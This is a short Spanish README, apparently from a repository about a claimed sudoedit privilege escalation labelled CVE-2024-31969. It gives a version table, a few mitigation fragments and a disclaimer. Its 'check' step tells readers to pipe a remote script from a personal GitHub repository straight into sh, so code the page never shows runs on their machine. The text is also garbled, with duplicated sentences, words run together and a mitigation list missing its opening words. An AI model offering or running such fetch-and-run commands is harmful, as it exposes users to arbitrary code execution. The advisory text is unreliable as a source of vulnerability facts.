
CVE-2024-31969 es una escalada de privilegios local en sudo cuando se utiliza sudoedit.
CVE-2024-31969 es una vulnerabilidad de escalada de privilegios local en sudo al usar el comando sudoedit.
Esta vulnerabilidad se introdujo a partir de sudo 1.9.0 debido a la forma incorrecta en que sudoedit validaba las variables de entorno del usuario y la propiedad de los archivos.
Una falla introducida en sudo 1.9.0 en la forma en que
sudoeditvalidaba las variables de entorno de los usuarios y la propiedad de los archivos.
Esta vulnerabilidad permite a un usuario local con acceso a sudoedit modificar archivos arbitrarios como root mediante la manipulación de variables de entorno como SUDO_EDITOR, o aprovechando symlinks.
| Versión de Sudo | Estado |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 Vulnerable |
| 1.9.15p5 o superior | ✅ Segura |
| 1.8.x (incluida 1.8.23) | ❌ No afectada |
Ejecute el siguiente comando:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo a la versión 1.9.15p5 o posterior.sudoers que permiten sudoedit a usuarios no root.env_keep o env_reset en el archivo /etc/sudoers.Este repositorio se creó con fines educativos y de documentación de seguridad de sistemas.
Está estrictamente prohibido utilizar esta información para actividades ilegales o sin el permiso por escrito del propietario del sistema.
Cualquier forma de uso indebido queda totalmente fuera de la responsabilidad del creador.